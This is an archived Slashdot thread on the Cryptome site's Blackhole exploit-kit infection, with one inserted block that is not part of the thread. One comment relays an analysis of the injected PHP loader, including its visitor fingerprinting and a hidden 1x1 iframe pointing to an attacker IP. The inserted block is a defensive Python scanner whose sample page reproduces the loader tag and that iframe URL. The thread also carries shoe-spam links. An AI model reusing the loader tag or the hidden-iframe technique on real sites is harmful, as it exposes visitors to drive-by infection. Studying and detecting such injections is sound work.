Cryptome Hit By Blackhole Exploit Kit

Unknown Lamer posted more than 2 years ago | from the leaks-were-sleeping-around dept.

Security 49

wiredmikey writes with an excerpt from Security Week: "Whistleblower site Cryptome has been hacked and infected by the Blackhole exploit kit. ... Cryptome co-founder John Young however told SecurityWeek that the Cryptome site is in the process of cleaning everything up, and that process should be finished by the end of the day. Founded in 1996, Cryptome publishes thousands of documents, including many related to national security, law enforcement and military. On Feb. 12, a reader advised the site that accessing a file had triggered a warning in their antivirus about the Blackhole exploit kit. ... Subsequent analysis found thousands of files on the site had been infected." Cryptome has certainly seen worse.

49 comments

frosty day in hell when (1)

Anonymous Coward | more than 2 years ago | (#39026729)

security whistleblowers get hacked? neverrrrrrrrrrrrrrrrrrrrrr

Don't criticize, do it ! (2, Insightful)

Taco Cowboy (5327) | more than 2 years ago | (#39027251)

If you can set up a public website so secure that no hacker can ever hack, why don't you set one up?

Instead of criticize, why don't you show the world that such a site is indeed possible?

Maybe you can even make a buck or two out of it

Re:Don't criticize, do it ! (3, Informative)

hweimer (709734) | more than 2 years ago | (#39028641)

If you can set up a public website so secure that no hacker can ever hack, why don't you set one up?

Formally verified web servers [nist.gov] have been around for a while.

Re:Don't criticize, do it ! (4, Insightful)

Anonymous Coward | more than 2 years ago | (#39029913)

"Formally verified web servers have been around for a while."

This reminds me of Knuth's famous quote about some code he released:

"Beware of bugs in the above code; I have only proved it correct, not tried it."

Re:Don't criticize, do it ! (1)

Anonymous Coward | more than 2 years ago | (#39031771)

The fact you posted this, and even worse, it was moderated up, is just mind blowing. It wonderfully validates just how completely clueless and out of touch with reality so many people, such as yourself, really are.

The only secure computer is one powered off, locked in a vault. And even then, it's only as secure as the one who holds the key.

Formally verified web servers are for CYA and provide only a minimal difference, if any, in the real world.

We at slashdot are all dumber now for having read your post.

The mysterious command (5, Informative)

Anonymous Coward | more than 2 years ago | (#39026755)

< SCRIPT src="/0002/afg/afg.php" >

I'm sure you all will sleep now that your burning curiosity was satisfied.

Re:The mysterious command (0, Troll)

FriendlyLurker (50431) | more than 2 years ago | (#39030107)

Perhaps, just perhaps, Cryptome is infecting its visitors on purpose. You don't publish "thousands of documents, including many related to national security, law enforcement and military" without breaking a few eggs.

Now that the common rabble's antivirus software has caught up, they are in the process of "cleaning up" the code so it won't happen again for a bit... watch this space.

Blackhole (3, Funny)

Hatta (162192) | more than 2 years ago | (#39026765)

Symantec says that Blackhole affects "various Windows platforms". Does Cryptome run on Windows?

Re:Blackhole (5, Informative)

jenic (1231704) | more than 2 years ago | (#39026953)

Symantec says that Blackhole affects "various Windows platforms". Does Cryptome run on Windows?

Whether or not cryptome runs in windows is not for me to say, however I do believe that cryptome was compromised and made to distribute the blackhole exploit. The following is found on TFA:

Although I'm not a full fledged security researcher, I could shed some light on the script that you found on your server. The basic program flow goes like this when a client loads the script (in your case every time anyone visits one of your pages):

  • the client IP address is compared against a list (net_match(...)) and if it falls within the range of the list it is in scope
  • the client OS is determined and if it is a Windows machine, it is in scope
  • the client browser is determined and if it is Internet Explorer (6.0 until 8.0) it is in scope
  • if the client is in scope (i.e. all three of the previous are true), a file is created on your webserver (empty text file); the filename is the IP address of the client (probably for later retrieval)
  • an iframe is loaded in the browser of the client that will be impossible to see (width and height of 1 pixel) and that iframe points to the webpage of 'http://65.75.137.243/Home/index.php'

After step 5 probably the browser is under attack and it will probably be a successful attack since the attacker knows the client to be a Windows machine running an Internet Explorer browser; my guess would be that the client is now infected and part of a botnet to be used in other attacks. The IP address of the attacker is a webserver for the domain http://absolutely-free-meeting.com/ [absolutely...eeting.com]. I'm not sure they have anything to do with this attack; probably they are a compromised server like your webserver was compromised. The WHOIS information for this domain is registered by GoDaddy and I include their data and the registrant's data below; it would be best to contact both so that they can clean up their server also. Conclusion:

  • your webserver was compromised and a file was uploaded (the attacking script)
  • the attacker was only interested in certain IP addresses (probably only a certain location)
  • the clients that are infected are infected from another web server (no idea why, since that attack script could have been put on your webserver also)

PS: I tried to format that as best I could but slashdot was having none of it
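The comment above describes what the injected script did from the server's side (a foreign script tag in served pages, a 1x1 iframe, and an empty marker file per visitor IP). The following is an added example, not code from the thread or from Cryptome, of how a site operator could check their own content for those same indicators: it scans HTML for script sources outside an assumed allow-list prefix (`/js/`, an assumption) and for near-invisible iframes, and separately flags files in the web root whose names are bare IPv4 addresses. The sample page and file names are constructed for the example; the script path and iframe URL in the sample are the ones quoted in the thread.

```python
"""Scan static web content for indicators of an injected exploit-kit loader:
  1. <script src=...> tags whose source is outside the site's own script path
  2. iframes that are 1x1 or hidden via CSS
  3. files in the web root named after IPv4 addresses (per-visitor markers)
All inputs below are constructed for this example.
"""
import ipaddress
import re
from html.parser import HTMLParser

# Assumed allow-list: where this site legitimately serves its own scripts.
ALLOWED_SCRIPT_PREFIXES = ("/js/",)


class InjectionFinder(HTMLParser):
    """Collects (kind, src) tuples for suspicious script and iframe tags."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag names; normalise attribute names too.
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script" and "src" in a:
            src = a["src"].strip()
            if not src.startswith(ALLOWED_SCRIPT_PREFIXES):
                self.findings.append(("script", src))
        elif tag == "iframe" and self._is_hidden(a):
            self.findings.append(("hidden-iframe", a.get("src", "")))

    @staticmethod
    def _is_hidden(a):
        """True for a 1x1 (or smaller) frame or one hidden by inline CSS."""
        def px(value):
            m = re.match(r"\s*(\d+)", value)
            return int(m.group(1)) if m else None

        w, h = px(a.get("width", "")), px(a.get("height", ""))
        tiny = w is not None and h is not None and w <= 1 and h <= 1
        style = a.get("style", "").replace(" ", "").lower()
        return tiny or "display:none" in style or "visibility:hidden" in style


def scan_html(text):
    """Return the list of suspicious tags found in one HTML document."""
    parser = InjectionFinder()
    parser.feed(text)
    parser.close()
    return parser.findings


def ip_named_files(names):
    """Return the file names that parse as IPv4 addresses."""
    hits = []
    for name in names:
        try:
            ipaddress.IPv4Address(name)
            hits.append(name)
        except ValueError:
            pass
    return hits


# Constructed sample page: one legitimate script, the injected loader from the
# thread, the 1x1 iframe from the thread, and one ordinary embedded frame.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="/0002/afg/afg.php"></script>
</head><body>
<p>Document index</p>
<iframe src="http://65.75.137.243/Home/index.php" width="1" height="1"></iframe>
<iframe src="/viewer" width="600" height="400"></iframe>
</body></html>"""

# Constructed web-root listing; the two dotted names are documentation-range
# addresses standing in for visitor IPs written by the marker step.
SAMPLE_FILES = ["index.html", "afg.php", "203.0.113.7", "198.51.100.23", "notes.txt"]

if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_PAGE):
        print(f"{kind}: {src}")
    for name in ip_named_files(SAMPLE_FILES):
        print(f"marker file: {name}")
```

Run over a real tree, the HTML check belongs in a loop over every served page, since the thread notes the loader was appended to thousands of files; the marker-file check is cheap enough to run from cron and is a useful tell on its own because a legitimate site rarely creates files named after visitor addresses.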

Re:Blackhole (2, Insightful)

smudj (1983234) | more than 2 years ago | (#39027025)

Not sure if I would consider Symantec an "expert" in antivirus/anti-intrusion solutions any longer

Re:Blackhole (0)

wbr1 (2538558) | more than 2 years ago | (#39027985)

Sure they are. Just take the 'anti' part off and throw in scareware and RogueAV somewheres.

Re:Blackhole (0)

TheLink (130905) | more than 2 years ago | (#39029557)

The Symantec messages had the phrase "the attack was resulted from", is this considered OK for US English?

Or they've outsourced that bit to somewhere else?

Netcraft confirms it (0)

Anonymous Coward | more than 2 years ago | (#39032109)

That the OS is unknown [netcraft.com]

mysterious (5, Funny)

Moblaster (521614) | more than 2 years ago | (#39026775)

The secret command shows up as a dot (".") on my system.

This may not be enlightening to anyone, but it appears to be a small black hole.

Re:mysterious (2)

steelfood (895457) | more than 2 years ago | (#39027537)

It's just evidence of the LHC working properly.

Re:mysterious (1)

cold fjord (826450) | more than 2 years ago | (#39028771)

You should have warned him not to lean too close to his screen or he could potentially be sucked in and crushed by the immense gravitational forces known to exist in certain configurations of punctuation

Most Slashdotters are aware of the risk and that is why we so often see the more cautious ones omitting any meaningful punctuation

With any luck the LHC will continue past its triumph in explaining the observed asymmetry between grammar and punctuation Nazis to helping us understand the Higgs and the asymmetry in matter and antimatter

Re:mysterious (1)

Genda (560240) | more than 2 years ago | (#39029931)

Also be careful: if the punctuation begins to glow, it's reaching the end of its life and is about to evaporate in a rather impressive gamma ray burst. The upside is you can use the burst to sterilize food for long term storage or eliminate unpleasant neighbors.

Re:mysterious (1)

Fjandr (66656) | more than 2 years ago | (#39030189)

even more careful slashdotters avoid the use of capital letters as the increase in mass from the extra black can cause the danger zone to increase in size a great deal

Re:mysterious (5, Funny)

user flynn (236683) | more than 2 years ago | (#39027833)

I clicked on the link and I couldn't see anything.

Since then I've been slowly depressing my back button for what seems like years... to you.

I've been infected too. (1)

Anonymous Coward | more than 2 years ago | (#39026789)

Almost every single sentence on my system ends in one of those ".". Including this one. Oh my god...

Don't worry (1)

zAPPzAPP (1207370) | more than 2 years ago | (#39026791)

The blackhole may suck up all your whistleblow data, but no one can retrieve it from there.

Re:Don't worry (2, Interesting)

prehistoricman5 (1539099) | more than 2 years ago | (#39026919)

Not true. Black holes emit radiation in the form of Hawking Radiation. Because of the laws of physics, this radiation carries information about what went into the hole. Wikipedia's description is decent. http://en.wikipedia.org/wiki/Black_hole_information_paradox [wikipedia.org]

Re:Don't worry (0)

Anonymous Coward | more than 2 years ago | (#39028661)

Carries information in the same way that a cryptographic hash carries information about a stream of data. Black holes are the universe's hash functions!

"Blackhole WINDOWS Exploit Kit". (4, Informative)

couchslug (175151) | more than 2 years ago | (#39026905)

Yes, it matters.

"Blackhole IE Exploit Kit" (4, Informative)

sakdoctor (1087155) | more than 2 years ago | (#39027051)

This attack specifically checks for, and excludes, browsers which are not IE 6 to 8

Re:"Blackhole BrowserPlugin Exploit Kit" (0)

Anonymous Coward | more than 2 years ago | (#39027551)

What it really looks for is outdated plugins. Lmgtfy'ing for things like spl0, spl1, spl2 all at once might luck out and show you a source. (Just be careful)

I analyzed a blackhole sent to a blackberry, and all the splX functions came back empty, but it still included the PluginCheck code.

Why would the operator care what browser you have? As long as your Java runtime is pre 6u29 it's all the same.

Re:"Blackhole IE Exploit Kit" (0)

Anonymous Coward | more than 2 years ago | (#39033631)

So it's an educational contribution for the betterment of the internet.

Re:"Blackhole WINDOWS Exploit Kit". (0)

Anonymous Coward | more than 2 years ago | (#39033873)

lexus Trike www.7gnomov.biz/category_6.html

How Nice (-1)

rudy_wayne (414635) | more than 2 years ago | (#39026969)

Yet another "security" website that can't be arsed to actually secure their own shit.

Re:How Nice (1)

equex (747231) | more than 2 years ago | (#39030957)

This is not a security site. Also, do any of these elite security websites have a 100% clean record?

Blackhole expliot kit?? (1)

Tyrannosaur (2485772) | more than 2 years ago | (#39026999)

Doc this is heavy!

Hmm (2)

koan (80826) | more than 2 years ago | (#39027115)

The thing that bothers me most about this is that it was an end user's anti-virus that detected it rather than software protecting the servers.

Re:Hmm (1)

AHuxley (892839) | more than 2 years ago | (#39027917)

Would some hosts not have "software protecting the servers" as a monthly or yearly upgrade in their basic to pro hosting options?

Re:Hmm (1)

koan (80826) | more than 2 years ago | (#39028749)

Not sure what you're saying, in general I expect a server to have better protection than a client.

Re:Hmm (1)

AHuxley (892839) | more than 2 years ago | (#39029053)

Products like Sitelock might be offered per year per domain. http://www.sitelock.com/products.php [sitelock.com]
See how the protection offered expands from a basic to premium services.
Your host might offer https, static, databases, web 2.0 look/feel, unlimited data but extra security may be an 'extra'.

Re:Hmm (1)

Lehk228 (705449) | more than 2 years ago | (#39031291)

It makes sense, you can't depend on a compromised system to detect itself

Re:Hmm (1)

koan (80826) | more than 2 years ago | (#39039621)

That's another odd statement. I think the previous guy was trying to sell me something, and you seem to be stating the obvious: I would not expect a compromised system to detect an issue (which is what I think you meant); the idea is to keep it from being compromised in the first place.

Re:Hmm (1)

Lehk228 (705449) | more than 2 years ago | (#39106409)

my point is, the software they were using either failed or was circumvented (or they were using none, unlikely)

Doesn't say so in TFA (2, Informative)

Anonymous Coward | more than 2 years ago | (#39027205)

But the infection started on the 8th of February.

Revenge? (1)

cold fjord (826450) | more than 2 years ago | (#39028801)

I have to wonder if this might be some sort of revenge attack due to the feud that has developed between Wikileaks and Cryptome?

Re:Revenge? (1)

Xest (935314) | more than 2 years ago | (#39031059)

I don't think there's really a feud, just that Cryptome got pissy that this new little upstart Wikileaks came and stole all its glory with leaks that made Cryptome's past leaks look pretty small fry.

Really, Cryptome showed a bit of penis envy, but that was about it.

With the white background in the end it looks even (-1, Offtopic)

manysky211 (2573731) | more than 2 years ago | (#39028947)

2011 New Nike SB Dunks [es-nikedunksb.net] , SB Dunks [es-nikedunksb.net] bearing one of the most skilled Zoom Stefan Janoski re-launch of Nike Dunk [es-nikedunksb.net] a new topic for this two-shoes for the design drawn to cheap nike dunk shoes [es-nikedunksb.net] shoes this back to the face and then return to starting material with dark brown leather for the uppers, Nike SB shoes [es-nikedunksb.net] , to keep up with the unique sailing shoe lace detail, with the white background in the end it looks even more perfect. Nike Dunk shoes [es-nikedunksb.net] .

Re:With the white background in the end it looks e (-1)

Anonymous Coward | more than 2 years ago | (#39029669)

you really think slashdotters give a flying fuck about nike's crappy shoes?

captcha: idlest --didn't know that was a word! yes I am the IDLEST!

Re:With the white background in the end it looks e (0)

Anonymous Coward | more than 2 years ago | (#39035003)

Dude, I don't think the spambot cares what you or anyone else thinks.

Re:With the white background in the end it looks e (1)

Shifty0x88 (1732980) | more than 2 years ago | (#39056505)

jesus, you would think with a post history like manysky211 has, that they would be removed from slashdot. reported as spam.

You insensitive clOd! (-1)

Anonymous Coward | more than 2 years ago | (#39029243)

the lAst nIght of we don't sux0r as

They must be using (0)

Anonymous Coward | more than 2 years ago | (#39033363)

McAfee, 'nuff said.

Analysis (1)

Shifty0x88 (1732980) | more than 2 years ago | (#39056513)

Hey I just sent in my analysis of the PHP file they were asking about.

Anyone wanna take a second look?

I'm not that great of a PHP coder, but maybe a second, third, nth pair of eyes could help figure it all out.

BTW, they called me A6.

Cryptome Hit By Blackhole Exploit Kit (0)

Anonymous Coward | more than 2 years ago | (#39056915)

I wonder how supernam will feel about this.
